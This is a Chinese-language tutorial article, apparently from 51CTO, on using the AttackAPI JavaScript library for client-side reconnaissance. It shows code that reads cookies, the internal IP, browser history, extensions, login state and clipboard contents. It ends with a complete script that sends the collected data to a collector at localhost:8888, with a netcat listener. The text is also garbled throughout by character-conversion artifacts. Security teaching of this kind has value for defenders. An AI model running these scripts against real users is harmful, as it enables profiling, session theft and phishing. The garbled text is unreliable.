【51CTO.com 獨家特稿】多年來客戶端安全一直未引起人們的足夠重視，但是如今情況發(fā)生了急劇轉(zhuǎn)變，客戶端安全已經(jīng)成為信息安全領(lǐng)域的焦點之一。Web惡意軟件、AJAX蠕蟲、瀏覽歷史暴破、登錄檢測、傀儡控制技術(shù)網(wǎng)絡(luò)端口掃描以及瀏覽器劫持等各種技術(shù)只是安全研究人員地下實驗室的部分技術(shù)，但是已經(jīng)帶來了非常大的影響。

一種類型的安全專業(yè)浮現(xiàn)并變成主流利用機制時，供應(yīng)廠商和個人就會開始發(fā)行框架和自動工具，來處理工具和測試過程。雖然供應(yīng)廠商最初主要將精力放在AJAX審計工具方面，但是安全研究人員更關(guān)注的是連綿的系統(tǒng)邊界，以探索事實真相。

由于存在多種可能的攻擊矢量，Web應(yīng)用程序安全社區(qū)也建立了多個框架來探測、利用安全漏洞，從而揭示W(wǎng)eb 開發(fā)社區(qū)所面臨的種種問題。而本文將向大家介紹AttackAPI的詳細(xì)使用方法。

一、AttackAPI概述

AttackAPI是一個基于Web的攻擊構(gòu)造庫，它可以結(jié)合PHP、JavaScript及其他客戶端和服務(wù)器端技術(shù)進行使用。AttackAPI有幾十個不同功能的模塊組成，這些模塊既可以從瀏覽器使用，也可以從JavaScript解釋器執(zhí)行，例如 Mozilla Rhino。它的目標(biāo)是為實現(xiàn)漏洞利用而提供一個簡單易用的接口，主要用于測試和驗證之用。

在開始研究AttackAPI子程序之前，我們先來做一些準(zhǔn)備工作。首先，下載該庫，然后搭設(shè)一個測試環(huán)境，我們將在這個環(huán)境中開發(fā)大部分示例程序。為此，我們需要安裝、運行以下應(yīng)用程序：
支持PHP 4.x或者更新的版本的HTTP服務(wù)器（Apache+PHP或者AppServ）

www.apache.org/
www.php.net/
www.appservnetwork.com/
從GNUCITIZEN下載最新的AttackAPI
www.gnucitizen.org/projects/attackapi
Mozilla的網(wǎng)絡(luò)瀏覽器Firefox
www.getfirefox.com
Firefox擴展Firebug，地址www.getfirebug.com/

啟動Apache HTTP 服務(wù)器并且確保已在正常運行中。 在網(wǎng)上，介紹這類任務(wù)文檔很多，在此不再贅述。然后，從GNUCITIZEN下載AttackAPI程序包 ，并且將其抽取到Web服務(wù)器的根文件夾中。例如，如果使用的是AppServ，那么可以將這些文件放在C:\AppServ\www\attackapi中。

確保運行的Firefox已經(jīng)安裝了Firebug。我們之所以不辭勞苦的準(zhǔn)備這些東西，是因為它們可以在將來為我們剩下許多力氣，當(dāng)我們從Firebug的動態(tài)控制臺下做這些工作的時候，要比不停地保存和打開一些隨機的臨時文件要輕松得多。雖然我們這里使用的是Firefox，但是這里的例子照樣可以用在其它瀏覽器上，只需稍作修改即可。

做好這些初始設(shè)置后，打開Firefox，從localhost導(dǎo)航至AttackAPI文件夾，即http://localhost/attackapi。這時就會看到如圖1所示內(nèi)容。

圖1

從AttackAPI的文件結(jié)構(gòu)來到Build|Tests|firetest-interactive.htm，這個文件中包含了下面我們將用到的一些元素。因為我們不會對打開的頁面的HTML內(nèi)容做任何修改，所以打開 Firebug，并調(diào)整控制臺使其擴展至整個屏幕。
確保位于Console 選項卡中，并輸入命令：dir(AttackAPI)。如果一切正常的話，就會看到如圖2所示的AttackAPI 文檔對象模型（DOM）結(jié)構(gòu)。

圖2

在本文剩下部分中，我們將使用$A對象而不是AttackAPI來訪問和調(diào)用庫對象和方法。$A對象是AttackAPI的一個獨立的實例，并且包含更易使用的AttackAPI方法的快捷方式。 AttackAPI是一個結(jié)構(gòu)化程度很高的庫，通過圖2可以看出，它還進一步分為AttackAPI.core（庫核心）、AttackAPI.dom（跨瀏覽器的方法）和AttackAPI.utils（跨解釋器的方法）。通過使用上面所說的約定，AttackAPI的base64編碼函數(shù)的完整路徑為$A.encodeBase64，是不是非常簡潔呀？！這樣輸入代碼的時候是不是省力氣了，所以說，懶惰是促進人類進步的主要動力之一。

由于我們需要輸入的代碼較多，所以建議使用更大的命令行，首先在“選項”下拉菜單中選擇“更大的命令行”選項，如同圖3所示。

圖3

這時命令行會出現(xiàn)在窗口的右側(cè)，如下圖所示：

圖4

因為我們要鍵入許多代碼，所以難免出現(xiàn)輸入錯誤。所以打開更大的命令行之后，改起來會更快、更好。
需要注意的是，我們可以使用Load AttackAPI 書簽將AttackAPI 加載到選擇的頁面上，尤其是當(dāng)我們需要為某個站點開發(fā)利用程序，但是又不想通過Firebug修改該頁面的源代碼或者插入腳本標(biāo)簽的時候格外有用。該bookmarklet可以是從www.gnucitizen.org/projects/load-attackapi-bookmarklet下載。現(xiàn)在開始研究AttackAPI的客戶端踩點功能。

#p#

二、客戶端踩點

攻擊者一旦控制了受害者的瀏覽器，他們首先要做的第一件事情就是弄清楚他們俘獲的到底是什么樣的客戶端和平臺。為達(dá)到這一目的，他們只需在Firebug的命令行中輸入下列命令便可：
console.log($A.getAgent() );
console.log($A.getPlatform() );
命令行窗口下方的“運行”按鈕，就會看到這兩個函數(shù)的執(zhí)行結(jié)果，如下圖所示：

圖5

如您所見，瀏覽器類型和操作系統(tǒng)版本已經(jīng)展現(xiàn)在我們眼前了——事情就是這么簡單！
然而，攻擊者能做的事情遠(yuǎn)不止這些。在Firebug的命令行下輸入如下所示的兩行命令：
console.dir($A.getCookies() );
console.dir($A.getPlugins() );
命令行窗口下方的“運行”按鈕，就會看到這兩個函數(shù)的執(zhí)行結(jié)果，如下圖所示：

圖6

GetCookies函數(shù)會檢索出所有可用的Cookie，注意，這里的getCookies函數(shù)是一個易于使用的JavaScript 對象，這樣我們就無需對DOM對象document.cookie 進行手動解析了。 與getCookies函數(shù)類似，getPlugins函數(shù)會列出目前已經(jīng)安裝的所有瀏覽器插件；這個函數(shù)能夠運行在大多數(shù)瀏覽器上，但是Internet Explorer（IE）除外。

這里需要注意，如果客戶端使用的是IE的話，AttackAPI能夠訪問存儲在剪貼板中的數(shù)據(jù)：我們可以使用AttackAPI.dom.getClipboard來讀取剪貼板，并能使用AttackAPI.dom.setClipboard 函數(shù)來設(shè)置剪貼板。通常情況下，剪貼板會保存有攻擊者感興趣的內(nèi)容，例如用戶有時候會復(fù)制粘貼他們的密碼。通過使用這項功能，攻擊者可以很輕松地竊取剪貼板中的數(shù)據(jù)，進而利用這些數(shù)據(jù)來控制用戶帳戶。

我們知道，攻擊者可以攻擊位于局域網(wǎng)內(nèi)部的設(shè)備。為此，他們必須具有對局域網(wǎng)內(nèi)部結(jié)構(gòu)有一個很好的了解才行，對內(nèi)部網(wǎng)絡(luò)圖范圍更應(yīng)該有一個詳細(xì)的了解。他們可以做出以下假設(shè)，家庭用戶的地址范圍為192.168.0.0–192.168.1.0，邊界路由器地址為192.168.0.1或者192.168.1.1，而企業(yè)用戶位于10.0.0.0范圍內(nèi)，因為這個地址范圍能夠容納更多的用戶。另一方面，在下列三個AttackAPI函數(shù)的幫助下攻擊者可以很輕松地獲得內(nèi)部網(wǎng)絡(luò)信息：

console.log($A.getInternalIP() );
console.log($A.getInternalHostname() );
console.dir($A.getInternalNetworkInfo() );

命令行窗口下方的“運行”按鈕，就會看到這兩個函數(shù)的執(zhí)行結(jié)果，如下圖所示：

圖7

攻擊者可以很輕松地使用以下命令推測出邊界路由器：

console.log(new String($A.getInternalIP() ).replace(/.\d+$/, ‘.1’) );
知道了這些，攻擊者可以針對它發(fā)動大量不同的攻擊，以確定它的類型和版本，并最終通過跨站點腳本攻擊（XSS）或者某些其他弱點來利用這個邊界路由器。盡管老練的攻擊者能夠輕松提出一個合理的猜測，然而，猜測畢竟只是猜測而已，它未必總是有效。下面的內(nèi)容中，我們將要利用AttackAPI進行更多的網(wǎng)絡(luò)操作，但是現(xiàn)在我們只把精力集中在客戶端調(diào)查上。

對于AttackAPI來說，激動人心的功能并不在于獲取代理、平臺、cookies、插件和內(nèi)部網(wǎng)絡(luò)信息，更多好戲還在后頭。只要簡單的調(diào)用一個函數(shù)，攻擊者就可以提取并掃描當(dāng)前已經(jīng)安裝的Firefox擴展：

$A.scanExtensions({onfound: function(signature) {
console.dir(signature);
}});
函數(shù)scanExtensions使用內(nèi)置的特征數(shù)據(jù)庫（AttackAPI.dom.signatures）來調(diào)查可用的Firefox擴展。然而，您可以指定您自己的特征碼，如下所示：
$A.scanExtensions({onfound: function(signature) {
console.dir(signature);
}, signatures: [{name: ‘Customize Google’, url:
‘chrome://customizegoogle/skin/32×32.png’}]});

注意，通過了解已經(jīng)安裝了哪些Firefox擴展有助于揭示某些用戶行為模式。老辣的社會工程人員可以用來發(fā)動成功攻擊。例如，如果如果客戶端已經(jīng)安裝了FlickrFox、Picture2Life或者Flickrgethighrez擴展，那么他很可能具有一個Flickr帳戶。

如果在flickr.com 或者yahoo.com 上發(fā)現(xiàn)了XSS 安全漏洞，攻擊者就可以向這些用戶發(fā)送一封郵件，說他們的帳戶出了問題。并且讓這個郵件貌似來自他們使用的擴展。當(dāng)他們確認(rèn)該消息時，他們會被重定向至flickr.com 或者yahoo.com 的登錄頁面，這時他們會在此輸入其證書以便登錄。

這時，攻擊者就可以完全控制他們的證書，并且具有了這個在線身份所具有的一切權(quán)限。

利用AttackAPI來檢測一個用戶是否已經(jīng)登錄Flickr站點非常簡單，只需用到scanStates函數(shù)和內(nèi)部特征數(shù)據(jù)庫：

$A.scanStates({onfound: function(signature) {
console.dir(signature);
}});

就像函數(shù)scanExtensions一樣，您可以指定自己的特征碼，如下所示：

$A.scanStates({onfound: function(signature) {
console.dir(signature);
}, signatures: [name: ‘Flickr Logged In User’, url: ‘http://www.fl ickr.com/
account’, message: ‘syntax error’, line: 1}]});

欲了解如何為scanExtensios和scanStates函數(shù)編寫特征碼的更多信息，請訪問AttackAPI主頁，地址為www.gnucitizen.org/projects/attackapi。

迄今為止，我們已經(jīng)看到即使對AttackAPI的工作原理沒有深入了解，也可以輕松地用它來完成的許多任務(wù)。我們這里要展示的最后一個函數(shù)將用來顯示客戶端瀏覽歷史。讓我們看看以下代碼：

$A.scanHistory({onfound: function(url) {
console.log(url);
}});

通過上述代碼，就可以查看最近訪問的位于AttackAPI特征數(shù)據(jù)庫中所有站點。就像其他掃描函數(shù)一樣，您可以指定自己的要掃描的瀏覽歷史列表，如下所示：

$A.scanHistory({onfound: function(url) {
console.log(url);
}, urls: [‘http://www.google.com’, ‘http://www.gnucitizen.org’]});

需要注意的是，雖然攻擊者可以將該技術(shù)用于惡意目的，但是有些情況下它也有好的一面。例如，為了調(diào)查取證，人們可以掃描大量用戶以識別訪問過可疑站點的個人。

讓我們看看如何使用上面所有這些函數(shù)來對用戶進行全面的調(diào)查。在代碼片斷之后，我們還列出了收集到的各種信息：
var data = {
agent: $A.getAgent(),
platform: $A.getPlatform(),
cookies: $A.getCookies(),
plugins: $A.getPlugins(),
ip: $A.getInternalIP(),
hostname: $A.getInternalHostname(),
extensions: [],
states: [],
history: []};
var completed = 0;
$A.scanExtensions({
onfound: function (signature) {
data.extensions.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanStates({
onfound: function (signature) {
data.states.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanHistory({
onfound: function (url) {
data.history.push(url);
},
oncomplete: function () {
completed += 1;
}
});
var tmr = window.setInterval(function () {
if (completed < 3)
return;
console.dir(data);
window.clearInterval(tmr);
}, 1000);

這段代碼最終通過利用AttackAPI進行全面的客戶端調(diào)。其中scanStates、scanHistory和scanextensions函數(shù)都需要一個回調(diào)參數(shù)（即onfound事件）來返回結(jié)果，這一點需要注意。記住，JavaScript程序不是線性的。為此，我們必須等待這些函數(shù)結(jié)束，然后繼續(xù)正常的程序執(zhí)行路徑。

這個任務(wù)可以通過window.setInterval函數(shù)幫我們完成。setInterval函數(shù)被配置成檢查每秒完成的變量的數(shù)量。當(dāng)這個數(shù)量達(dá)到3時，將收集到的信息顯示在屏幕上。

當(dāng)攻擊者檢索這個信息時，他可能想要將該信息從客戶端輸送到某個存儲點以便做進一步的調(diào)查?？紤]一下，當(dāng)我們分析某個讀者屬于哪個用戶組時這些信息是多么的有用！這個信息不僅對市場營銷非常有用，而且對攻擊者的統(tǒng)計工具也是很有價值的。

取得客戶端到服務(wù)器的日期也是一個挑戰(zhàn)，不過AttackAPI利用一個單一的函數(shù)解決了所有瀏覽器兼容模式。下面看看我們是如何改寫客戶端調(diào)查代碼的：

var data = {
agent: $A.getAgent(),
platform: $A.getPlatform(),
cookies: $A.buildQuery($A.getCookies() ),
plugins: $A.getPlugins().join(‘,’),
ip: $A.getInternalIP(),
hostname: $A.getInternalHostname(),
extensions: [],
states: [],
history: []};
var completed = 0;
$A.scanExtensions({
onfound: function (signature) {
data.extensions.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanStates({
onfound: function (signature) {
data.states.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanHistory({
onfound: function (url) {
data.history.push(url);
},
oncomplete: function () {
completed += 1;
}
});
var tmr = window.setInterval(function () {
if (completed < 3)
return;
data.extensions = data.extensions.join(‘,’);
data.states = data.states.join(‘,’);
data.history = data.history.join(‘,’);
$A.transport({url: ‘http://localhost:8888/collect’, query: data});
window.clearInterval(tmr);
}, 1000);

如您所見，這里的代碼跟之前的非常相似，當(dāng)然也有不同之處，首先我們確信所有數(shù)據(jù)都存儲為String對象。 數(shù)組項是連續(xù)的、用逗號隔離的列表，可以利用統(tǒng)一資源定位符(URL)查詢來導(dǎo)出各個對象。您可以很輕松地利用$A.buildQuery 函數(shù)來構(gòu)造查詢。函數(shù)調(diào)用$A.buildQuery({name: ‘Fred’, lastName: ‘Johnson’});會導(dǎo)致name=Fred&lastName=Johnson。

回到我們的客戶端調(diào)查代碼，您可以很輕松地測試傳送機制。只需把NetCat設(shè)置成監(jiān)聽狀態(tài)，如下所示。利用下列命令，我們將打開端口8888，并將信息輸出等級設(shè)為較大值，即輸出更為詳細(xì)的信息：
nc -l -p 8888 -vvv

您一旦在Firebug控制臺執(zhí)行了這些JavaScript代碼，將會看到所有到達(dá)NetCat的數(shù)據(jù)都變成一個長長的URL編碼的字符串。當(dāng)然，您可以使用任何類型的編碼(例如 Base64或者JSON），因為URL編碼是默認(rèn)支持的，所以使用它的時候無需作任何變更。

#p#

三、小結(jié)

多年來客戶端安全一直未引起人們的足夠重視，但是如今情況發(fā)生了急劇轉(zhuǎn)變，客戶端安全已經(jīng)成為信息安全領(lǐng)域的焦點之一。Web惡意軟件、AJAX蠕蟲、瀏覽歷史暴破、登錄檢測、傀儡控制技術(shù)網(wǎng)絡(luò)端口掃描以及瀏覽器劫持等各種技術(shù)只是安全研究人員地下實驗室的部分技術(shù)，但是已經(jīng)帶來了非常大的影響。

一種類型的安全專業(yè)浮現(xiàn)并變成主流利用機制時，供應(yīng)廠商和個人就會開始發(fā)行框架和自動工具，來處理工具和測試過程。雖然供應(yīng)廠商最初主要將精力放在AJAX審計工具方面，但是安全研究人員更關(guān)注的是連綿的系統(tǒng)邊界，以探索事實真相。

由于存在多種可能的攻擊矢量，Web應(yīng)用程序安全社區(qū)也建立了多個框架來探測、利用安全漏洞，從而揭示W(wǎng)eb 開發(fā)社區(qū)所面臨的種種問題。而本文將向大家介紹AttackAPI測試環(huán)境的搭設(shè)以及客戶端踩點的方法進行了詳盡的介紹，下一篇我們將對AttackAPI的其他用法做詳盡的介紹。

【51CTO.COM 獨家特稿，轉(zhuǎn)載請注明出處及作者！】

【編輯推薦】

1. 黑客如何利用Javascript逃避檢測入侵臺式電腦
2. Adobe Acrobat和Reader被找出Javascript漏洞
3. 分析ARP病毒是如何利用的Javascript技術(shù)的